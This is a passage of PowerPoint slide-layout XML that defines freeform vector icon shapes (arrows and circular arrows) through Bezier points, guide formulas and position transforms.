                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="185"/>
                    <a:pt x="121" y="185"/>
                    <a:pt x="121" y="18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2"/>
                    <a:pt x="94" y="162"/>
                    <a:pt x="76" y="151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24" y="142"/>
                    <a:pt x="20" y="136"/>
                    <a:pt x="21" y="131"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="127"/>
                    <a:pt x="24" y="125"/>
                    <a:pt x="26" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="122"/>
                    <a:pt x="31" y="121"/>
                    <a:pt x="34" y="122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62" y="125"/>
                    <a:pt x="63" y="125"/>
                    <a:pt x="64" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="123"/>
                    <a:pt x="64" y="113"/>
                    <a:pt x="52" y="92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4" y="28"/>
                    <a:pt x="15" y="22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2" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="11"/>
                    <a:pt x="3" y="16"/>
                    <a:pt x="1" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="29"/>
                    <a:pt x="3" y="34"/>
                    <a:pt x="6" y="40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43" y="102"/>
                    <a:pt x="44" y="106"/>
                    <a:pt x="4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0" y="107"/>
                    <a:pt x="24" y="108"/>
                    <a:pt x="19" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="115"/>
                    <a:pt x="9" y="121"/>
                    <a:pt x="7" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="142"/>
                    <a:pt x="14" y="154"/>
                    <a:pt x="27" y="157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82" y="171"/>
                    <a:pt x="92" y="174"/>
                    <a:pt x="99" y="175"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="192"/>
                    <a:pt x="109" y="192"/>
                    <a:pt x="109" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="204"/>
                    <a:pt x="116" y="204"/>
                    <a:pt x="116" y="204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81" y="166"/>
                    <a:pt x="181" y="166"/>
                    <a:pt x="181" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="159"/>
                    <a:pt x="193" y="159"/>
                    <a:pt x="193" y="159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75" y="127"/>
                    <a:pt x="175" y="127"/>
                    <a:pt x="175" y="127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1"/>
                    <a:pt x="161" y="61"/>
                    <a:pt x="161" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="60"/>
                    <a:pt x="161" y="60"/>
                    <a:pt x="161" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="58"/>
                    <a:pt x="160" y="58"/>
                    <a:pt x="160" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="53"/>
                    <a:pt x="157" y="48"/>
                    <a:pt x="155" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="35"/>
                    <a:pt x="142" y="33"/>
                    <a:pt x="137" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="33"/>
                    <a:pt x="131" y="33"/>
                    <a:pt x="128" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="27"/>
                    <a:pt x="113" y="23"/>
                    <a:pt x="99" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="28"/>
                    <a:pt x="95" y="29"/>
                    <a:pt x="93" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="31"/>
                    <a:pt x="90" y="32"/>
                    <a:pt x="89" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="30"/>
                    <a:pt x="76" y="30"/>
                    <a:pt x="68" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="35"/>
                    <a:pt x="64" y="37"/>
                    <a:pt x="63" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="39"/>
                    <a:pt x="60" y="40"/>
                    <a:pt x="59" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="30"/>
                    <a:pt x="46" y="19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7" y="5"/>
                    <a:pt x="25" y="0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40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7E1E30-735E-4B6E-8FFF-3E358A5983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136281">
              <a:off x="2834209" y="6251000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D588CC72-A3B4-4671-91B5-1FD2685D1F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7800658">
              <a:off x="6209502" y="3207147"/>
              <a:ext cx="692150" cy="752475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 184"/>
                <a:gd name="T1" fmla="*/ 44 h 200"/>
                <a:gd name="T2" fmla="*/ 52 w 184"/>
                <a:gd name="T3" fmla="*/ 44 h 200"/>
                <a:gd name="T4" fmla="*/ 52 w 184"/>
                <a:gd name="T5" fmla="*/ 25 h 200"/>
                <a:gd name="T6" fmla="*/ 132 w 184"/>
                <a:gd name="T7" fmla="*/ 25 h 200"/>
                <a:gd name="T8" fmla="*/ 132 w 184"/>
                <a:gd name="T9" fmla="*/ 44 h 200"/>
                <a:gd name="T10" fmla="*/ 52 w 184"/>
                <a:gd name="T11" fmla="*/ 0 h 200"/>
                <a:gd name="T12" fmla="*/ 132 w 184"/>
                <a:gd name="T13" fmla="*/ 0 h 200"/>
                <a:gd name="T14" fmla="*/ 132 w 184"/>
                <a:gd name="T15" fmla="*/ 16 h 200"/>
                <a:gd name="T16" fmla="*/ 52 w 184"/>
                <a:gd name="T17" fmla="*/ 16 h 200"/>
                <a:gd name="T18" fmla="*/ 52 w 184"/>
                <a:gd name="T19" fmla="*/ 0 h 200"/>
                <a:gd name="T20" fmla="*/ 52 w 184"/>
                <a:gd name="T21" fmla="*/ 52 h 200"/>
                <a:gd name="T22" fmla="*/ 132 w 184"/>
                <a:gd name="T23" fmla="*/ 52 h 200"/>
                <a:gd name="T24" fmla="*/ 132 w 184"/>
                <a:gd name="T25" fmla="*/ 85 h 200"/>
                <a:gd name="T26" fmla="*/ 184 w 184"/>
                <a:gd name="T27" fmla="*/ 85 h 200"/>
                <a:gd name="T28" fmla="*/ 92 w 184"/>
                <a:gd name="T29" fmla="*/ 162 h 200"/>
                <a:gd name="T30" fmla="*/ 0 w 184"/>
                <a:gd name="T31" fmla="*/ 85 h 200"/>
                <a:gd name="T32" fmla="*/ 52 w 184"/>
                <a:gd name="T33" fmla="*/ 85 h 200"/>
                <a:gd name="T34" fmla="*/ 52 w 184"/>
                <a:gd name="T35" fmla="*/ 52 h 200"/>
                <a:gd name="T36" fmla="*/ 9 w 184"/>
                <a:gd name="T37" fmla="*/ 168 h 200"/>
                <a:gd name="T38" fmla="*/ 174 w 184"/>
                <a:gd name="T39" fmla="*/ 168 h 200"/>
                <a:gd name="T40" fmla="*/ 183 w 184"/>
                <a:gd name="T41" fmla="*/ 177 h 200"/>
                <a:gd name="T42" fmla="*/ 183 w 184"/>
                <a:gd name="T43" fmla="*/ 191 h 200"/>
                <a:gd name="T44" fmla="*/ 174 w 184"/>
                <a:gd name="T45" fmla="*/ 200 h 200"/>
                <a:gd name="T46" fmla="*/ 9 w 184"/>
                <a:gd name="T47" fmla="*/ 200 h 200"/>
                <a:gd name="T48" fmla="*/ 0 w 184"/>
                <a:gd name="T49" fmla="*/ 191 h 200"/>
                <a:gd name="T50" fmla="*/ 0 w 184"/>
                <a:gd name="T51" fmla="*/ 177 h 200"/>
                <a:gd name="T52" fmla="*/ 9 w 184"/>
                <a:gd name="T53" fmla="*/ 16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00">
                  <a:moveTo>
                    <a:pt x="132" y="44"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="44"/>
                    <a:pt x="52" y="44"/>
                    <a:pt x="52" y="44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132" y="25"/>
                    <a:pt x="132" y="25"/>
                    <a:pt x="132" y="25"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="132" y="44"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="52" y="0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52" y="16"/>
                    <a:pt x="52" y="16"/>
                    <a:pt x="52" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="52" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="52" y="52"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="52"/>
                    <a:pt x="132" y="52"/>
                    <a:pt x="132" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="85"/>
                    <a:pt x="132" y="85"/>
                    <a:pt x="132" y="85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52" y="85"/>
                    <a:pt x="52" y="85"/>
                    <a:pt x="52" y="85"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="52" y="52"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="168"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="168"/>
                    <a:pt x="174" y="168"/>
                    <a:pt x="174" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="168"/>
                    <a:pt x="183" y="172"/>
                    <a:pt x="183" y="177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6"/>
                    <a:pt x="179" y="200"/>
                    <a:pt x="174" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="200"/>
                    <a:pt x="9" y="200"/>
                    <a:pt x="9" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="200"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="191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2"/>
                    <a:pt x="4" y="168"/>
                    <a:pt x="9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43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6970934D-26FE-4CDE-8637-7AAA7CB264C9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285330" y="5016889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44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{676CCF3A-12C9-4C4D-97DB-1E3F136BE1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5165" y="-83383"/>
              <a:ext cx="752475" cy="684213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 218 w 474"/>
                <a:gd name="T1" fmla="*/ 0 h 431"/>
                <a:gd name="T2" fmla="*/ 474 w 474"/>
                <a:gd name="T3" fmla="*/ 215 h 431"/>
                <a:gd name="T4" fmla="*/ 218 w 474"/>
                <a:gd name="T5" fmla="*/ 431 h 431"/>
                <a:gd name="T6" fmla="*/ 218 w 474"/>
                <a:gd name="T7" fmla="*/ 303 h 431"/>
                <a:gd name="T8" fmla="*/ 0 w 474"/>
                <a:gd name="T9" fmla="*/ 303 h 431"/>
                <a:gd name="T10" fmla="*/ 0 w 474"/>
                <a:gd name="T11" fmla="*/ 130 h 431"/>
                <a:gd name="T12" fmla="*/ 218 w 474"/>
                <a:gd name="T13" fmla="*/ 130 h 431"/>
                <a:gd name="T14" fmla="*/ 218 w 474"/>
                <a:gd name="T15" fmla="*/ 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4" h="431">
                  <a:moveTo>
                    <a:pt x="218" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="474" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="130"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2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45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26828896-E8EE-44A3-8D13-03C9E016AC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45208" y="703944"/>
              <a:ext cx="818640" cy="820397"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 197"/>
                <a:gd name="T1" fmla="*/ 197 h 197"/>
                <a:gd name="T2" fmla="*/ 22 w 197"/>
                <a:gd name="T3" fmla="*/ 160 h 197"/>
                <a:gd name="T4" fmla="*/ 0 w 197"/>
                <a:gd name="T5" fmla="*/ 174 h 197"/>
                <a:gd name="T6" fmla="*/ 5 w 197"/>
                <a:gd name="T7" fmla="*/ 92 h 197"/>
                <a:gd name="T8" fmla="*/ 81 w 197"/>
                <a:gd name="T9" fmla="*/ 123 h 197"/>
                <a:gd name="T10" fmla="*/ 56 w 197"/>
                <a:gd name="T11" fmla="*/ 138 h 197"/>
                <a:gd name="T12" fmla="*/ 99 w 197"/>
                <a:gd name="T13" fmla="*/ 157 h 197"/>
                <a:gd name="T14" fmla="*/ 157 w 197"/>
                <a:gd name="T15" fmla="*/ 99 h 197"/>
                <a:gd name="T16" fmla="*/ 99 w 197"/>
                <a:gd name="T17" fmla="*/ 40 h 197"/>
                <a:gd name="T18" fmla="*/ 46 w 197"/>
                <a:gd name="T19" fmla="*/ 74 h 197"/>
                <a:gd name="T20" fmla="*/ 10 w 197"/>
                <a:gd name="T21" fmla="*/ 57 h 197"/>
                <a:gd name="T22" fmla="*/ 99 w 197"/>
                <a:gd name="T23" fmla="*/ 0 h 197"/>
                <a:gd name="T24" fmla="*/ 197 w 197"/>
                <a:gd name="T25" fmla="*/ 99 h 197"/>
                <a:gd name="T26" fmla="*/ 99 w 197"/>
                <a:gd name="T2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7" h="197">
                  <a:moveTo>
                    <a:pt x="99" y="197"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="197"/>
                    <a:pt x="40" y="183"/>
                    <a:pt x="22" y="16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81" y="123"/>
                    <a:pt x="81" y="123"/>
                    <a:pt x="81" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="138"/>
                    <a:pt x="56" y="138"/>
                    <a:pt x="56" y="138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="150"/>
                    <a:pt x="82" y="157"/>
                    <a:pt x="99" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="157"/>
                    <a:pt x="157" y="131"/>
                    <a:pt x="157" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="66"/>
                    <a:pt x="131" y="40"/>
                    <a:pt x="99" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="40"/>
                    <a:pt x="55" y="54"/>
                    <a:pt x="46" y="74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25" y="24"/>
                    <a:pt x="60" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="0"/>
                    <a:pt x="197" y="44"/>
                    <a:pt x="197" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="153"/>
                    <a:pt x="153" y="197"/>
                    <a:pt x="99" y="1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46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35949090-88B1-47A8-8010-5A7124D919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444726" y="150070"/>
              <a:ext cx="736600" cy="744538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 196"/>
                <a:gd name="T1" fmla="*/ 73 h 198"/>
                <a:gd name="T2" fmla="*/ 134 w 196"/>
                <a:gd name="T3" fmla="*/ 56 h 198"/>
                <a:gd name="T4" fmla="*/ 95 w 196"/>
                <a:gd name="T5" fmla="*/ 40 h 198"/>
                <a:gd name="T6" fmla="*/ 39 w 196"/>
                <a:gd name="T7" fmla="*/ 83 h 198"/>
                <a:gd name="T8" fmla="*/ 0 w 196"/>
                <a:gd name="T9" fmla="*/ 73 h 198"/>
                <a:gd name="T10" fmla="*/ 94 w 196"/>
                <a:gd name="T11" fmla="*/ 0 h 198"/>
                <a:gd name="T12" fmla="*/ 163 w 196"/>
                <a:gd name="T13" fmla="*/ 29 h 198"/>
                <a:gd name="T14" fmla="*/ 182 w 196"/>
                <a:gd name="T15" fmla="*/ 13 h 198"/>
                <a:gd name="T16" fmla="*/ 196 w 196"/>
                <a:gd name="T17" fmla="*/ 95 h 198"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 73 h 198"/>
                <a:gd name="T20" fmla="*/ 61 w 196"/>
                <a:gd name="T21" fmla="*/ 142 h 198"/>
                <a:gd name="T22" fmla="*/ 101 w 196"/>
                <a:gd name="T23" fmla="*/ 158 h 198"/>
                <a:gd name="T24" fmla="*/ 157 w 196"/>
                <a:gd name="T25" fmla="*/ 115 h 198"/>
                <a:gd name="T26" fmla="*/ 196 w 196"/>
                <a:gd name="T27" fmla="*/ 125 h 198"/>
                <a:gd name="T28" fmla="*/ 101 w 196"/>
                <a:gd name="T29" fmla="*/ 198 h 198"/>
                <a:gd name="T30" fmla="*/ 32 w 196"/>
                <a:gd name="T31" fmla="*/ 169 h 198"/>
                <a:gd name="T32" fmla="*/ 14 w 196"/>
                <a:gd name="T33" fmla="*/ 185 h 198"/>
                <a:gd name="T34" fmla="*/ 0 w 196"/>
                <a:gd name="T35" fmla="*/ 103 h 198"/>
                <a:gd name="T36" fmla="*/ 81 w 196"/>
                <a:gd name="T37" fmla="*/ 125 h 198"/>
                <a:gd name="T38" fmla="*/ 61 w 196"/>
                <a:gd name="T39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6" h="198">
                  <a:moveTo>
                    <a:pt x="115" y="73"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="56"/>
                    <a:pt x="134" y="56"/>
                    <a:pt x="134" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="48"/>
                    <a:pt x="109" y="40"/>
                    <a:pt x="95" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="40"/>
                    <a:pt x="45" y="58"/>
                    <a:pt x="39" y="8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1" y="31"/>
                    <a:pt x="49" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="0"/>
                    <a:pt x="146" y="13"/>
                    <a:pt x="163" y="29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96" y="95"/>
                    <a:pt x="196" y="95"/>
                    <a:pt x="196" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="73"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="142"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="150"/>
                    <a:pt x="87" y="158"/>
                    <a:pt x="101" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="158"/>
                    <a:pt x="151" y="140"/>
                    <a:pt x="157" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="125"/>
                    <a:pt x="196" y="125"/>
                    <a:pt x="196" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="167"/>
                    <a:pt x="147" y="198"/>
                    <a:pt x="101" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="198"/>
                    <a:pt x="50" y="185"/>
                    <a:pt x="32" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="185"/>
                    <a:pt x="14" y="185"/>
                    <a:pt x="14" y="18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81" y="125"/>
                    <a:pt x="81" y="125"/>
                    <a:pt x="81" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="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53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235BB394-FA93-4D8F-9DEF-F477385F8E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348066">
              <a:off x="5190905" y="5189844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54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98383A54-AAE4-4410-BFB6-00A367C003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03112" y="1787563"/>
              <a:ext cx="747712" cy="747713"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 199"/>
                <a:gd name="T1" fmla="*/ 0 h 199"/>
                <a:gd name="T2" fmla="*/ 199 w 199"/>
                <a:gd name="T3" fmla="*/ 100 h 199"/>
                <a:gd name="T4" fmla="*/ 99 w 199"/>
                <a:gd name="T5" fmla="*/ 199 h 199"/>
                <a:gd name="T6" fmla="*/ 0 w 199"/>
                <a:gd name="T7" fmla="*/ 100 h 199"/>
                <a:gd name="T8" fmla="*/ 99 w 199"/>
                <a:gd name="T9" fmla="*/ 0 h 199"/>
                <a:gd name="T10" fmla="*/ 99 w 199"/>
                <a:gd name="T11" fmla="*/ 166 h 199"/>
                <a:gd name="T12" fmla="*/ 158 w 199"/>
                <a:gd name="T13" fmla="*/ 129 h 199"/>
                <a:gd name="T14" fmla="*/ 134 w 199"/>
                <a:gd name="T15" fmla="*/ 118 h 199"/>
                <a:gd name="T16" fmla="*/ 99 w 199"/>
                <a:gd name="T17" fmla="*/ 140 h 199"/>
                <a:gd name="T18" fmla="*/ 60 w 199"/>
                <a:gd name="T19" fmla="*/ 101 h 199"/>
                <a:gd name="T20" fmla="*/ 99 w 199"/>
                <a:gd name="T21" fmla="*/ 63 h 199"/>
                <a:gd name="T22" fmla="*/ 127 w 199"/>
                <a:gd name="T23" fmla="*/ 75 h 199"/>
                <a:gd name="T24" fmla="*/ 111 w 199"/>
                <a:gd name="T25" fmla="*/ 85 h 199"/>
                <a:gd name="T26" fmla="*/ 161 w 199"/>
                <a:gd name="T27" fmla="*/ 105 h 199"/>
                <a:gd name="T28" fmla="*/ 164 w 199"/>
                <a:gd name="T29" fmla="*/ 51 h 199"/>
                <a:gd name="T30" fmla="*/ 150 w 199"/>
                <a:gd name="T31" fmla="*/ 61 h 199"/>
                <a:gd name="T32" fmla="*/ 99 w 199"/>
                <a:gd name="T33" fmla="*/ 36 h 199"/>
                <a:gd name="T34" fmla="*/ 34 w 199"/>
                <a:gd name="T35" fmla="*/ 101 h 199"/>
                <a:gd name="T36" fmla="*/ 99 w 199"/>
                <a:gd name="T37" fmla="*/ 16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9" h="199">
                  <a:moveTo>
                    <a:pt x="99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99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99" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="99" y="166"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="166"/>
                    <a:pt x="147" y="151"/>
                    <a:pt x="158" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="118"/>
                    <a:pt x="134" y="118"/>
                    <a:pt x="134" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="131"/>
                    <a:pt x="114" y="140"/>
                    <a:pt x="99" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="140"/>
                    <a:pt x="60" y="123"/>
                    <a:pt x="60" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="80"/>
                    <a:pt x="78" y="63"/>
                    <a:pt x="99" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="63"/>
                    <a:pt x="120" y="67"/>
                    <a:pt x="127" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="85"/>
                    <a:pt x="111" y="85"/>
                    <a:pt x="111" y="8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50" y="61"/>
                    <a:pt x="150" y="61"/>
                    <a:pt x="150" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="46"/>
                    <a:pt x="119" y="36"/>
                    <a:pt x="99" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="36"/>
                    <a:pt x="34" y="65"/>
                    <a:pt x="34" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="137"/>
                    <a:pt x="63" y="166"/>
                    <a:pt x="99" y="1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4" name="Freeform 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84FBF4E1-6B2A-451D-ABF0-7F4A19B0E6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48710" y="5440783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56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A6ED6A-B2B0-489C-B5EF-7CA7C937133C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="18910795">
              <a:off x="11427924" y="15247"/>
              <a:ext cx="754062" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 234 w 475"/>
                <a:gd name="T1" fmla="*/ 0 h 467"/>
                <a:gd name="T2" fmla="*/ 78 w 475"/>
                <a:gd name="T3" fmla="*/ 157 h 467"/>
                <a:gd name="T4" fmla="*/ 78 w 475"/>
                <a:gd name="T5" fmla="*/ 157 h 467"/>
                <a:gd name="T6" fmla="*/ 0 w 475"/>
                <a:gd name="T7" fmla="*/ 235 h 467"/>
                <a:gd name="T8" fmla="*/ 0 w 475"/>
                <a:gd name="T9" fmla="*/ 235 h 467"/>
                <a:gd name="T10" fmla="*/ 0 w 475"/>
                <a:gd name="T11" fmla="*/ 235 h 467"/>
                <a:gd name="T12" fmla="*/ 78 w 475"/>
                <a:gd name="T13" fmla="*/ 311 h 467"/>
                <a:gd name="T14" fmla="*/ 78 w 475"/>
                <a:gd name="T15" fmla="*/ 311 h 467"/>
                <a:gd name="T16" fmla="*/ 234 w 475"/>
                <a:gd name="T17" fmla="*/ 467 h 467"/>
                <a:gd name="T18" fmla="*/ 312 w 475"/>
                <a:gd name="T19" fmla="*/ 389 h 467"/>
                <a:gd name="T20" fmla="*/ 210 w 475"/>
                <a:gd name="T21" fmla="*/ 290 h 467"/>
                <a:gd name="T22" fmla="*/ 475 w 475"/>
                <a:gd name="T23" fmla="*/ 290 h 467"/>
                <a:gd name="T24" fmla="*/ 475 w 475"/>
                <a:gd name="T25" fmla="*/ 185 h 467"/>
                <a:gd name="T26" fmla="*/ 210 w 475"/>
                <a:gd name="T27" fmla="*/ 185 h 467"/>
                <a:gd name="T28" fmla="*/ 312 w 475"/>
                <a:gd name="T29" fmla="*/ 79 h 467"/>
                <a:gd name="T30" fmla="*/ 234 w 475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5" h="467">
                  <a:moveTo>
                    <a:pt x="234" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="157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78" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210" y="185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312" y="79"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2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6" name="Freeform 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8730F005-B65C-402D-B05D-5D4903669885}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="19087588">
              <a:off x="193920" y="5083603"/>
              <a:ext cx="747712" cy="741363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 237 w 471"/>
                <a:gd name="T1" fmla="*/ 0 h 467"/>
                <a:gd name="T2" fmla="*/ 393 w 471"/>
                <a:gd name="T3" fmla="*/ 157 h 467"/>
                <a:gd name="T4" fmla="*/ 393 w 471"/>
